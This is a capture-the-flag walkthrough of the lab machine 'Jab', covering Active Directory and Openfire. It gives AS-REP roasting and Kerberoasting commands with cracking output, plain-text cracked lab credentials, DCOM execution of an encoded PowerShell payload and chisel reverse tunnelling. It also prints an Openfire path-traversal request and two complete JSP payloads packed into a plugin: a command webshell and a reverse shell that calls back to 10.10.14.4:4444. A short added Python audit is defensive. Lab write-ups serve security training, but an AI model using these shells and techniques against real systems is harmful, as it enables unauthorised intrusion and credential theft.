🥊

Jab

Open TCP ports from the initial port scan:
53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49712,49766
echo "10.129.225.173 jab.htb dc01.jab.htb" >> /etc/hosts
 
kerbrute userenum -d jab.htb --dc 10.129.225.173 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
This generated a very large list of usernames, which was not useful at this point.
Back to port 5222 (XMPP): searching online turned up nothing.
Moving on to 7070/tcp (reported as realserver): it serves the Openfire HTTP Binding Service.
 
Download Pidgin, an XMPP client.
 
Register a new account and log in.
Under the room list function I found two rooms: test and test2.
Room test cannot be opened, but in room test2 I found a user named bdavis.
bdavis was trying to send an XSS payload in the channel:
(Wednesday, November 22, 2023 02:49:50 AM HKT) bdavis: <img src="" alt="some text" />
Try adding a plugin called Service Discovery.
It finds 4 services available. Search for users:
sudo pidgin -d > output.log
Add the XMPP Console plugin, then search for users.
Export them in XML format (the userlist file), then extract the bare usernames:

```bash
grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' userlist | sed 's/@jab.htb//g' | sort | uniq > userlists
rm userlist
```

Enumerate again with the new user list to check whether any account has Kerberos pre-authentication disabled (AS-REP roasting):

```bash
GetNPUsers.py jab.htb/ -usersfile userlists -outputfile output -no-pass -dc-ip 10.129.225.173
```
This returns hashes for three accounts. Run hashcat to brute-force the passwords (this takes a while):
hashcat -m 18200 output /usr/share/wordlists/rockyou.txt
This yields a credential: jmontgomery:Midnight_121
Update the account in Pidgin with this credential.
A new room, pentest2003, now appears; here is its history:
```
(Wednesday, November 22, 2023 02:31:13 AM HKT) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status?
(Wednesday, November 22, 2023 02:33:58 AM HKT) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate.
(Wednesday, November 22, 2023 03:30:41 AM HKT) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate?
(Wednesday, November 22, 2023 03:30:43 AM HKT) bdavis:
$ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation
--------------------  ------------  --------  --------------------------  ---------  ----------
http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>
(Wednesday, November 22, 2023 03:30:56 AM HKT) bdavis:
$ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

<SNIP>
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$<SNIP>:!@#$%^&*(1qazxsw

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]

Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023
(Wednesday, November 22, 2023 03:31:57 AM HKT) adunn: I'll pass this along and circle back with the group
(Wednesday, November 22, 2023 03:32:23 AM HKT) bdavis: perfect, thanks Angela!
(Wednesday, November 22, 2023 02:22:55 AM HKT) The topic is:
```
Another credential is found in this room: svc_openfire:!@#$%^&*(1qazxsw
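The two Kerberos weaknesses chained so far (accounts with pre-authentication disabled, found with GetNPUsers.py above, and the svc_openfire SPN that finding #2 in the chat asked the team to re-test) can be checked from the defender's side with a simple audit of account attributes. The Python below is an added example, not part of the original writeup: it runs over constructed account records (userAccountControl, servicePrincipalName, msDS-SupportedEncryptionTypes); jmontgomery, svc_openfire, bdavis, http/xmpp.jab.local and DC01 come from the page, while old_svc and MSSQLSvc/db.jab.htb are made up for the sample.

```python
# Added example (not from the writeup): offline audit of AD user records for
# the two Kerberos weaknesses abused on this box. All records are constructed;
# a real run would pull the same attributes from LDAP.
UF_ACCOUNTDISABLE = 0x0002            # userAccountControl bits
UF_DONT_REQUIRE_PREAUTH = 0x400000    # AS-REP roastable (hashcat -m 18200)
ETYPE_RC4_HMAC = 0x4                  # msDS-SupportedEncryptionTypes bit

SAMPLE_USERS = [  # constructed sample data, modelled on the writeup's findings
    {"sam": "jmontgomery", "uac": 0x410200, "spn": [], "enc": None},
    {"sam": "svc_openfire", "uac": 0x10200, "spn": ["http/xmpp.jab.local"], "enc": 0x4},
    {"sam": "bdavis", "uac": 0x10200, "spn": [], "enc": None},
    {"sam": "old_svc", "uac": 0x10202, "spn": ["MSSQLSvc/db.jab.htb"], "enc": None},
    {"sam": "DC01$", "uac": 0x82000, "spn": ["HOST/dc01.jab.htb"], "enc": 0x1c},
]

def audit_kerberos_exposure(users):
    """Return (account, finding) pairs for enabled accounts only."""
    findings = []
    for u in users:
        if u["uac"] & UF_ACCOUNTDISABLE:
            continue  # disabled accounts get no tickets, skip them
        if u["uac"] & UF_DONT_REQUIRE_PREAUTH:
            findings.append((u["sam"], "asrep_roastable"))
        # Kerberoasting only pays off against user accounts with an SPN;
        # computer accounts (trailing $) have long random passwords.
        if u["spn"] and not u["sam"].endswith("$"):
            enc = u["enc"]
            # unset attribute: the DC will still issue RC4 (etype 23) tickets
            if enc is None or enc & ETYPE_RC4_HMAC:
                findings.append((u["sam"], "kerberoastable_rc4"))
            else:
                findings.append((u["sam"], "kerberoastable_aes_only"))
    return findings

def remediation_verified(users, account):
    """Post-remediation check like finding #2 in the chat: True when the
    named account no longer appears in the audit output."""
    return all(sam != account for sam, _ in audit_kerberos_exposure(users))

if __name__ == "__main__":
    for sam, finding in audit_kerberos_exposure(SAMPLE_USERS):
        print(f"{sam}: {finding}")
    print("svc_openfire fixed:", remediation_verified(SAMPLE_USERS, "svc_openfire"))
```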
Trying this credential with evil-winrm fails to log in:
evil-winrm -i 10.129.225.173 -u jab.htb/svc_openfire -p '!@#$%^&*(1qazxsw'
DCOM execution through impacket-dcomexec (MMC20 object) works instead; the command runs a base64-encoded PowerShell payload and the listener gets a connection back:
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.129.230.215 'cmd.exe /c powershell -e <base64-encoded PowerShell payload>' -nooutput
Upload chisel for port forwarding, so that port 9090 on the target's loopback interface is reachable from the attack machine. On the attack machine:
chisel server -p 3456 --reverse
On the target:
.\chisel.exe client -v 10.10.14.4:3456 R:9090:127.0.0.1:9090
Googling for an exploit, I found CVE-2023-32315 (the PoC repository by miko550 on GitHub).
This PoC does not work for creating a new admin account.
Trying the svc_openfire credential from earlier instead, I logged into the admin panel.
Continuing the exploitation: the admin console has a page for uploading plugins.
Back to the article: the CVE-2023-32315-Openfire-Bypass project by tangxiaofeng7, releases at https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass/releases
The plugin uploaded, but it was not accessible.
Create a webshell called webshell.jsp:

```jsp
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
    String line = in.readLine();
    if (line != null) {
        response.setHeader("X-Error", line);
    }
}
%>
```
Then pack it into a .jar so it can be uploaded as a plugin:

```bash
git clone https://github.com/igniterealtime/openfire-exampleplugin.git
cd openfire-exampleplugin
cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp
mvn -B package
cp ./target/exampleplugin.jar exampleplugin.zip
zip -ur exampleplugin.zip ./plugin.xml ./readme.html
mv exampleplugin.zip ./target/exampleplugin.jar
```
Building with Maven is time-intensive.
Upload the jar through the plugins page.
curl -v "http://127.0.0.1:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/plugins/exampleplugin/exampleplugin-page.jsp?cmd=whoami"
It doesn't seem to work, so I create a JSP reverse shell and do the build again:
```jsp
<%
/*
 * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (attacker machine), with the IP and Port specified at the end of the file.
 * If it cannot connect, an HTML form will prompt and you can input commands (sh/cmd) there and it will print the output in the HTML.
 * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button "Send" is clicked, it will try to connect to the reverse shell again (apart from executing
 * the command specified in the HTML form). This is to keep it simple.
 */
%>
<%@page import="java.lang.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%@page import="java.util.*"%>
<html>
<head>
<title>jrshell</title>
</head>
<body>
<form METHOD="POST" NAME="myform" ACTION="">
<input TYPE="text" NAME="shell">
<input TYPE="submit" VALUE="Send">
</form>
<pre>
<%
// Define the OS
String shellPath = null;
try {
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
        shellPath = new String("/bin/sh");
    } else {
        shellPath = new String("cmd.exe");
    }
} catch( Exception e ){}

// INNER HTML PART
if (request.getParameter("shell") != null) {
    out.println("Command: " + request.getParameter("shell") + "\n<BR>");
    Process p;
    if (shellPath.equals("cmd.exe"))
        p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("shell"));
    else
        p = Runtime.getRuntime().exec("/bin/sh -c " + request.getParameter("shell"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}

// TCP PORT PART
class StreamConnector extends Thread {
    InputStream wz;
    OutputStream yr;
    StreamConnector( InputStream wz, OutputStream yr ) {
        this.wz = wz;
        this.yr = yr;
    }
    public void run() {
        BufferedReader r = null;
        BufferedWriter w = null;
        try {
            r = new BufferedReader(new InputStreamReader(wz));
            w = new BufferedWriter(new OutputStreamWriter(yr));
            char buffer[] = new char[8192];
            int length;
            while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 ) {
                w.write( buffer, 0, length );
                w.flush();
            }
        } catch( Exception e ){}
        try {
            if( r != null ) r.close();
            if( w != null ) w.close();
        } catch( Exception e ){}
    }
}

try {
    Socket socket = new Socket( "10.10.14.4", 4444 ); // Replace with wanted ip and port
    Process process = Runtime.getRuntime().exec( shellPath );
    new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
    new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
    out.println("port opened on " + socket);
} catch( Exception e ) {}
%>
</pre>
</body>
</html>
```
```bash
cd openfire-exampleplugin
cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp
mvn -B package
cp ./target/exampleplugin.jar exampleplugin.zip
zip -ur exampleplugin.zip ./plugin.xml ./readme.html
mv exampleplugin.zip ./target/exampleplugin.jar
```
It works!

Rooted!